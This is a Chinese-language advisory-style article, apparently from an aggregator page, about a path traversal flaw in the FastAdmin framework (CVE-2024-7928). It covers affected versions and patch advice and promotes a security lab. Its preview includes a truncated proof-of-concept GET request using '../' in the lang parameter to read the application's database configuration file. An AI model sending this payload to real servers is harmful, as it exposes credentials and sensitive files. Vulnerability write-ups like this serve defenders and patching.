【成功复现】FastAdmin路径遍历漏洞(CVE-2024-7928)

主要观点总结

本文介绍了FastAdmin框架的漏洞情况以及修复建议，并简要描述了弥天安全实验室的相关信息。

关键观点总结

关键观点1: FastAdmin框架漏洞介绍

FastAdmin是一套基于ThinkPHP和Bootstrap的网站后台开发框架，其1.3.4.20220530之前版本存在路径遍历漏洞，该漏洞允许攻击者通过读取系统文件来获取敏感信息。

关键观点2: 影响版本

受影响的FastAdmin版本为1.3.4.20220530之前版本。

关键观点3: 漏洞复现步骤

可以通过访问漏洞环境并对漏洞进行复现，使用特定的GET请求可以成功读取敏感文件。另外，可以使用Yakit工具加载nuclei文件进行漏洞测试。

关键观点4: 修复建议

厂商已发布升级补丁以修复此漏洞，用户可以从相关链接下载并安装升级补丁以修复受影响系统。同时，也提醒用户关注并跟随安全公告，及时修复漏洞以保障系统安全。

关键观点5: 弥天安全实验室简介

介绍了实验室成立的时间、主要研究领域、组织性质、技术共享与交流的理念以及为网络安全发展所做的贡献。

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 FastAdmin是Karson个人开发者的一套基于ThinkPHP和Bootstrap的网站后台开发框架。 它基于ThinkPHP和Bootstrap两大主流技术构建，拥有完善的权限管理系统和一键生成CRUD等强大功能。FastAdmin致力于提高开发效率，降低开发成本，同时确保后台系统的稳定性和安全性。 FastAdmin 1.3.4.20220530之前版本存在路径遍历漏洞，该漏洞源于存在任意文件读取漏洞，攻击者利用此漏洞可以获取系统敏感信息。 0x02影响版本 影响产品及版本 FastAdmin 1.3.4.20220530之前版本 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC  漏洞复现 GET /index/ajax/lang?lang=../../application/database HTTP/1.1 Host: 127.0.0.1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64 ………………………………